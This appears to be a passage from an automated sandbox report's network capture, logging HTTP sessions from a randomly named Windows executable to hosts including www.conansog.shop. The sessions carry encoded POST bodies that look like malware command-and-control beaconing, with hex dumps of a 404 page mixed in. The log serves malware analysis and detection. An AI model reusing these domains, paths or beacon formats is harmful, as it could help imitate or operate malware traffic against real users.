67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
Jan 11, 2025 09:34:08.925906897 CET	1236	IN	Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
Jan 11, 2025 09:34:08.925940990 CET	448	IN	Data Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
Jan 11, 2025 09:34:08.925959110 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 38 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 63 61 6c 63 28 35 30 25 20 20 2d 20 31 30 70 78 29 3b 0a 20 20 20 20 20 20 20 20 Data Ascii: z-index: 1; bottom: -8px; left: calc(50% - 10px); display: block; width: 0; content: ''; border-width: 10px 8px 0; border-style: solid; border-color: #fc3 transparent;
Jan 11, 2025 09:34:08.926012993 CET	1236	IN	Data Raw: 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e Data Ascii: } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal { display: inline; float: left; } } .lol-error-page__ad-banner-holizontal-right { margin-left: 0;
Jan 11, 2025 09:34:08.926074028 CET	1236	IN	Data Raw: 2e 31 20 30 2d 32 34 2e 33 31 37 20 33 2e 39 38 38 2d 33 30 2e 31 35 33 20 31 31 2e 38 36 2d 39 2e 34 20 31 32 2e 35 30 37 2d 34 2e 34 38 39 20 33 30 2e 30 31 31 2d 34 2e 33 20 33 30 2e 37 34 38 2e 30 35 32 2e 31 36 36 2e 31 32 37 2e 33 32 33 2e Data Ascii: .1 0-24.317 3.988-30.153 11.86-9.4 12.507-4.489 30.011-4.3 30.748.052.166.127.323.224.467-.326 3.036-.826 6.051-1.5 9.03-1.691 7.962-3.442 16.209 1.5 22.44 4.942 6.231 15.69 9.155 33.7 9.226h.718c17.583 0 28.1-2.845 33.056-8.94 4.956-6.095 3.3
Jan 11, 2025 09:34:08.926091909 CET	1236	IN	Data Raw: 32 34 32 2d 2e 35 6c 2d 31 31 2e 30 34 34 2d 31 30 2e 35 32 37 63 2d 2e 34 30 31 2d 2e 33 39 2d 2e 36 2d 2e 39 34 34 2d 2e 35 33 39 2d 31 2e 35 6c 32 2e 39 39 33 2d 32 33 2e 38 38 35 63 2e 31 31 31 2d 2e 39 2e 38 37 34 2d 31 2e 35 37 37 20 31 2e Data Ascii: 242-.5l-11.044-10.527c-.401-.39-.6-.944-.539-1.5l2.993-23.885c.111-.9.874-1.577 1.781-1.58h16.521c.887-.001 1.643.644 1.781 1.52l2.992 23.972c.054.561-.156 1.116-.569 1.5l-11.417 10.538c-.343.311-.794.476-1.257.462z"/><path fill="#fff" d="M42.
Jan 11, 2025 09:34:08.926126003 CET	896	IN	Data Raw: 2e 39 2d 38 2e 32 39 33 2d 32 32 2e 34 34 37 2d 31 39 2e 35 36 36 2e 31 36 38 2d 31 2e 36 30 35 2e 31 31 37 2d 33 2e 32 32 35 2d 2e 31 35 2d 34 2e 38 31 36 2d 2e 31 2d 2e 39 31 38 2d 2e 32 32 34 2d 31 2e 39 31 31 2d 2e 32 38 34 2d 33 2e 30 31 2d Data Ascii: .9-8.293-22.447-19.566.168-1.605.117-3.225-.15-4.816-.1-.918-.224-1.911-.284-3.01-.06-1.099 0-2.017 0-3.01.156-1.888-.073-3.787-.673-5.584 1.197-7.123 5.212-13.464 11.139-17.593 7.482 7.736 22.117 10.821 34.418 10.535.947 2.363 1.615 4.828 1.9
Jan 11, 2025 09:34:08.926143885 CET	1236	IN	Data Raw: 32 2e 36 39 34 2d 33 34 2e 33 34 32 2d 31 30 2e 34 33 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 33 39 2e 32 35 36 20 34 34 2e 36 32 35 63 2d 31 2e 38 20 30 2d 33 2e 32 20 31 2e 37 37 36 2d 33 2e 32 31 37 20 34 Data Ascii: 2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.394 4
Jan 11, 2025 09:34:08.926177979 CET	224	IN	Data Raw: 4d 35 32 2e 33 36 35 20 36 30 2e 37 31 34 63 2d 2e 35 34 38 2e 30 30 31 2d 31 2e 30 36 36 2d 2e 32 34 38 2d 31 2e 34 30 37 2d 2e 36 37 37 6c 2d 32 2e 33 31 39 2d 32 2e 39 32 63 2d 2e 34 35 35 2d 2e 35 37 39 2d 2e 35 31 34 2d 31 2e 33 37 37 2d 2e Data Ascii: M52.365 60.714c-.548.001-1.066-.248-1.407-.677l-2.319-2.92c-.455-.579-.514-1.377-.15-2.017 1.141-1.931 1.865-4.079 2.125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.122 1.645-.153 2.481-.
Jan 11, 2025 09:34:08.930970907 CET	1236	IN	Data Raw: 38 34 32 20 34 2e 39 2d 32 2e 30 32 20 37 2e 30 38 39 6c 31 2e 35 38 36 20 32 63 2e 34 32 38 2e 35 33 36 2e 35 31 37 20 31 2e 32 36 37 2e 32 32 38 20 31 2e 38 38 39 2d 2e 32 38 39 2e 36 32 32 2d 2e 39 30 34 20 31 2e 30 32 37 2d 31 2e 35 39 20 31 Data Ascii: 842 4.9-2.02 7.089l1.586 2c.428.536.517 1.267.228 1.889-.289.622-.904 1.027-1.59 1.046l-.004-.004zm26.535 11.408l-17.284-.647c-.997-.038-1.776-.877-1.738-1.874.038-.997.877-1.776 1.874-1.738l15.892.587 2.439-8.338c.145-.658.646-1.18 1.297-1.35

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49972	163.44.185.183	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:34:10.699666977 CET	551	OUT	GET /21k5/?I6=x8CX&40G=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW HTTP/1.1 Host: www.sankan-fukushi.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:34:11.559779882 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:34:11 GMT Content-Type: text/html Content-Length: 19268 Connection: close Server: Apache Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
Jan 11, 2025 09:34:11.559837103 CET	1236	IN	Data Raw: 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a Data Ascii: line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack: center; jus
Jan 11, 2025 09:34:11.559887886 CET	628	IN	Data Raw: 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 3b 0a 20 20 20 20 20 20 Data Ascii: -page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; border-radius: 6px;
Jan 11, 2025 09:34:11.559922934 CET	1236	IN	Data Raw: 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 66 63 33 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 Data Ascii: border-color: #fc3 transparent; } @media screen and (min-width: 640px) { .lol-error-page__information-balloon { -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error
Jan 11, 2025 09:34:11.559973001 CET	1236	IN	Data Raw: 69 7a 6f 6e 74 61 6c 2d 72 69 67 68 74 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 Data Ascii: izontal-right { margin-left: 0; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal-right { margin-left: 20px; } } </style> <script type="text/javascript">
Jan 11, 2025 09:34:11.560007095 CET	1236	IN	Data Raw: 20 30 20 32 38 2e 31 2d 32 2e 38 34 35 20 33 33 2e 30 35 36 2d 38 2e 39 34 20 34 2e 39 35 36 2d 36 2e 30 39 35 20 33 2e 33 34 33 2d 31 34 2e 34 36 33 20 31 2e 37 31 36 2d 32 32 2e 34 35 35 7a 6d 2d 36 32 2e 32 37 31 2d 33 38 2e 33 33 34 63 35 2e Data Ascii: 0 28.1-2.845 33.056-8.94 4.956-6.095 3.343-14.463 1.716-22.455zm-62.271-38.334c5.193-6.923 14.381-10.43 27.3-10.43h.314c12.974 0 22.058 3.582 26.936 10.535 2.787 4.183 4.285 9.091 4.31 14.117-4.045-13.545-15.289-21.356-31.774-21.431-11.253 0-
Jan 11, 2025 09:34:11.560039043 CET	1236	IN	Data Raw: 37 36 2d 31 2e 32 35 37 2e 34 36 32 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 34 32 2e 38 33 32 20 38 39 2e 36 32 36 6c 39 2e 31 37 33 20 38 2e 38 20 39 2e 34 38 38 2d 38 2e 37 32 36 2d 32 2e 36 33 34 2d 32 31 Data Ascii: 76-1.257.462z"/><path fill="#fff" d="M42.832 89.626l9.173 8.8 9.488-8.726-2.634-21.476h-13.393z"/><path fill="#f60" d="M88.16 43.646c-1.061-2.641-3.633-4.362-6.48-4.335-.793-.06-1.59.001-2.364.181-.533-2.534-1.341-5.002-2.409-7.36-.304-.67-.98
Jan 11, 2025 09:34:11.560075045 CET	1236	IN	Data Raw: 31 20 33 34 2e 34 31 38 20 31 30 2e 35 33 35 2e 39 34 37 20 32 2e 33 36 33 20 31 2e 36 31 35 20 34 2e 38 32 38 20 31 2e 39 39 20 37 2e 33 34 35 2d 2e 36 31 20 31 2e 37 38 34 2d 2e 38 35 34 20 33 2e 36 37 33 2d 2e 37 31 38 20 35 2e 35 35 34 20 30 Data Ascii: 1 34.418 10.535.947 2.363 1.615 4.828 1.99 7.345-.61 1.784-.854 3.673-.718 5.554 0 .933 0 1.926-.075 3.01-.075 1.084-.195 2.017-.3 2.935-.282 1.589-.348 3.209-.195 4.816-3.73 11.227-12.574 19.384-22.555 19.384zm32.922-26.443c-.011 2.098-.449 4
Jan 11, 2025 09:34:11.560107946 CET	1072	IN	Data Raw: 37 68 2e 30 30 34 7a 6d 33 32 2e 30 35 34 2e 31 33 37 63 2d 2e 34 38 37 2d 2e 30 30 33 2d 2e 39 35 32 2d 2e 32 30 34 2d 31 2e 32 38 37 2d 2e 35 35 37 2d 31 2e 30 39 2d 2e 38 37 34 2d 32 2e 35 36 38 2d 31 2e 30 38 37 2d 33 2e 38 36 31 2d 2e 35 35 Data Ascii: 7h.004zm32.054.137c-.487-.003-.952-.204-1.287-.557-1.09-.874-2.568-1.087-3.861-.557-.919.364-1.959-.078-2.336-.992-.377-.914.051-1.96.959-2.349 2.653-1.123 5.719-.581 7.826 1.385.468.523.59 1.27.314 1.915-.276.645-.901 1.072-1.602 1.095l-.013.
Jan 11, 2025 09:34:11.584104061 CET	1236	IN	Data Raw: 31 2e 38 37 34 2e 30 33 38 2d 2e 39 39 37 2e 38 37 37 2d 31 2e 37 37 36 20 31 2e 38 37 34 2d 31 2e 37 33 38 6c 31 35 2e 38 39 32 2e 35 38 37 20 32 2e 34 33 39 2d 38 2e 33 33 38 63 2e 31 34 35 2d 2e 36 35 38 2e 36 34 36 2d 31 2e 31 38 20 31 2e 32 Data Ascii: 1.874.038-.997.877-1.776 1.874-1.738l15.892.587 2.439-8.338c.145-.658.646-1.18 1.297-1.352.651-.172 1.345.034 1.796.534.452.5.586 1.211.348 1.841l-2.825 9.693c-.232.793-.974 1.327-1.8 1.294z"/><path fill="#fc3" d="M46.915 138.8l-.278-.231c-.8-
Jan 11, 2025 09:34:11.584140062 CET	1236	IN	Data Raw: 34 38 32 2d 31 2e 30 30 31 20 31 2e 33 33 33 2d 2e 38 20 32 2e 31 34 35 2e 32 31 36 2e 38 39 32 20 31 2e 30 31 35 20 31 2e 35 32 20 31 2e 39 33 33 20 31 2e 35 32 2e 39 31 38 20 30 20 31 2e 37 31 37 2d 2e 36 32 38 20 31 2e 39 33 33 2d 31 2e 35 32 Data Ascii: 482-1.001 1.333-.8 2.145.216.892 1.015 1.52 1.933 1.52.918 0 1.717-.628 1.933-1.52.201-.812-.117-1.663-.8-2.145-.332-.231-.727-.354-1.132-.353l-.001-.003zm0-9.427c-.742.001-1.422.415-1.763 1.074-.433.825-.244 1.839.456 2.453.692.608 1.712.659

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49973	104.21.41.74	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:34:16.779351950 CET	816	OUT	POST /m7wz/ HTTP/1.1 Host: www.conansog.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.conansog.shop Referer: http://www.conansog.shop/m7wz/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 39 33 39 33 48 49 53 6e 6a 57 41 72 6e 61 74 72 6b 6a 41 78 74 53 75 6d 39 68 79 56 39 41 79 53 36 36 77 2b 46 70 37 78 4f 68 43 42 46 36 76 37 53 75 2f 53 34 33 33 70 74 35 6b 33 78 48 4f 7a 54 4e 49 6e 59 43 2b 34 38 72 52 4e 62 77 42 7a 43 42 39 66 68 6d 49 72 6d 54 37 34 38 42 39 5a 74 79 64 37 4c 6f 48 79 6b 72 74 65 75 49 79 31 33 58 75 63 65 34 68 67 4a 45 5a 65 61 73 30 64 58 6c 65 62 68 45 6a 71 79 2b 62 59 64 63 70 66 7a 6c 65 79 2f 74 69 35 6f 4b 2f 57 61 47 4b 35 59 5a 64 46 52 52 4a 52 4d 59 58 5a 50 31 48 78 47 61 2b 6d 57 74 4b 61 49 76 76 6e 62 77 58 79 78 69 34 71 6b 51 3d 3d Data Ascii: 40G=p1DRQC/le5qi9393HISnjWArnatrkjAxtSum9hyV9AyS66w+Fp7xOhCBF6v7Su/S433pt5k3xHOzTNInYC+48rRNbwBzCB9fhmIrmT748B9Ztyd7LoHykrteuIy13Xuce4hgJEZeas0dXlebhEjqy+bYdcpfzley/ti5oK/WaGK5YZdFRRJRMYXZP1HxGa+mWtKaIvvnbwXyxi4qkQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49974	104.21.41.74	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:34:19.325855970 CET	836	OUT	POST /m7wz/ HTTP/1.1 Host: www.conansog.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.conansog.shop Referer: http://www.conansog.shop/m7wz/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 2f 55 6c 33 4c 4f 61 6e 7a 47 41 6b 72 36 74 72 79 54 42 34 74 53 71 6d 39 6b 57 37 39 79 6d 53 36 59 34 2b 45 6f 37 78 43 42 43 42 52 71 75 7a 50 2b 2f 46 34 33 79 57 74 37 41 33 78 48 61 7a 54 50 41 6e 59 31 43 37 2b 37 52 50 58 51 42 78 66 52 39 66 68 6d 49 72 6d 58 62 53 38 41 5a 5a 74 43 74 37 4c 4e 37 39 36 37 74 66 70 49 79 31 67 48 75 59 65 34 68 57 4a 46 46 30 61 70 77 64 58 6b 75 62 69 56 6a 74 38 4f 62 53 41 4d 6f 7a 79 57 6e 49 77 2f 2b 68 67 64 62 32 59 6b 62 63 64 76 63 6e 4c 7a 46 39 53 4a 76 69 4c 33 6a 48 52 38 6a 54 55 73 4f 43 46 4e 62 47 45 48 79 59 38 77 5a 75 79 67 37 38 76 38 39 59 64 52 35 70 68 6f 41 2b 67 4a 7a 46 65 47 63 3d Data Ascii: 40G=p1DRQC/le5qi/Ul3LOanzGAkr6tryTB4tSqm9kW79ymS6Y4+Eo7xCBCBRquzP+/F43yWt7A3xHazTPAnY1C7+7RPXQBxfR9fhmIrmXbS8AZZtCt7LN7967tfpIy1gHuYe4hWJFF0apwdXkubiVjt8ObSAMozyWnIw/+hgdb2YkbcdvcnLzF9SJviL3jHR8jTUsOCFNbGEHyY8wZuyg78v89YdR5phoA+gJzFeGc=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49975	104.21.41.74	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:34:21.873044968 CET	1849	OUT	POST /m7wz/ HTTP/1.1 Host: www.conansog.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.conansog.shop Referer: http://www.conansog.shop/m7wz/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 70 31 44 52 51 43 2f 6c 65 35 71 69 2f 55 6c 33 4c 4f 61 6e 7a 47 41 6b 72 36 74 72 79 54 42 34 74 53 71 6d 39 6b 57 37 39 79 65 53 36 71 41 2b 46 4c 54 78 44 42 43 42 4f 61 75 79 50 2b 2f 45 34 33 4b 53 74 37 4d 34 78 46 69 7a 53 71 55 6e 54 68 57 37 33 37 52 50 4b 41 42 79 43 42 38 58 68 6d 59 6e 6d 54 2f 53 38 41 5a 5a 74 42 31 37 43 34 48 39 34 37 74 65 75 49 79 44 33 58 75 77 65 34 35 47 4a 46 78 4f 61 61 49 64 58 45 2b 62 79 33 4c 74 36 65 62 63 54 38 6f 72 79 58 62 74 77 2b 53 48 67 59 50 49 59 6b 7a 63 64 5a 46 77 54 6a 42 34 4a 4a 7a 63 45 68 72 55 64 50 58 48 54 74 47 4c 4b 2b 4c 70 46 55 32 6d 6b 6a 6b 6d 37 48 62 34 7a 65 42 6f 59 44 52 34 6b 2b 6c 41 6e 72 58 43 63 77 52 69 59 36 46 69 2b 61 50 6e 62 48 59 44 6a 71 6c 41 33 72 78 58 66 6f 6f 32 63 7a 63 39 6d 64 64 54 33 77 39 48 66 55 44 6e 4a 70 4f 51 74 30 5a 7a 57 43 38 53 57 39 78 52 5a 67 75 64 55 37 59 58 4c 5a 71 2f 4f 36 31 31 64 76 71 2b 6d 7a 39 33 79 5a 61 6e 69 4b 68 31 6e 36 69 78 41 78 67 69 58 50 44 70 74 6c [TRUNCATED] Data Ascii: 40G=p1DRQC/le5qi/Ul3LOanzGAkr6tryTB4tSqm9kW79yeS6qA+FLTxDBCBOauyP+/E43KSt7M4xFizSqUnThW737RPKAByCB8XhmYnmT/S8AZZtB17C4H947teuIyD3Xuwe45GJFxOaaIdXE+by3Lt6ebcT8oryXbtw+SHgYPIYkzcdZFwTjB4JJzcEhrUdPXHTtGLK+LpFU2mkjkm7Hb4zeBoYDR4k+lAnrXCcwRiY6Fi+aPnbHYDjqlA3rxXfoo2czc9mddT3w9HfUDnJpOQt0ZzWC8SW9xRZgudU7YXLZq/O611dvq+mz93yZaniKh1n6ixAxgiXPDptl5gn2e+0UY6z5YnpeI2Y4HWq0+p4v11vG1h14PhJ3+iEmymcAT7z2Prta2CvDthlKqBKkT9XaGmFU4GvN3/rXHkPQCKHYk9ka0nEC8H/jv6r0nXZyH4K8B42Qsrmwzz1i6gcfAORDzvM9szlibYPvFSKjx8yjA2/qixvVvvITw5TkIbbYJjwpxiBPRz+b3zmyidsukTGDYEdyTGRk7NZspTxQcyGEewL8ENwjLPRC9ivHCLADeuuPy33sDr8TgwHCh1jRoka+Okscfkdf6B+YIRA/MCrRWFWUkt/7tfqv4tOjoo0nyjmO+hA/ovg35f1KmncqJNyibvH4mMLFSpxjhap3i5AP3Q203FCFXQVwZ0UyxdLsZ17tx/6NEavQYp7hWoXG2ZcFd8t1sOevHfPCVwowft2r6Q+Yt5fgEDeE2E8ix2fE/VC1HHZMwe9RRpxv1C2GrTbVrp07sI7+DC3jc1f719LGyVJECtl+9D4DFR0qDsys0k3R4Ta2UFKZ54uGSeIYZnWDH2d2o6lRqd7N+zZwSomqfEjDOPbW+jOzht/kyj1ew2M598QX71OBIcK6ErxHCAENa/3teROY9XQjwIMuea4i99jbTgAqff5gU0gfwP+KWIG6i8q7l9CnBrDfMeHA5OEbWE1uW+LUCy6Gp2M1+QMFh/u60w [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49976	104.21.41.74	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:34:24.413515091 CET	545	OUT	GET /m7wz/?40G=k3rxT2/5CoW37253fqeJ2GQ6srVb5CIz6HeAuhy5mTu7sK1SIq+qIwOPP+2nE63N1XqW2uYy0GjlFOwlbRaUhItXSR0DNFdPvSJbxiH35Vlkry1kHcbP6o4IkfKAx2mWTolkC1NZH4oP&I6=x8CX HTTP/1.1 Host: www.conansog.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
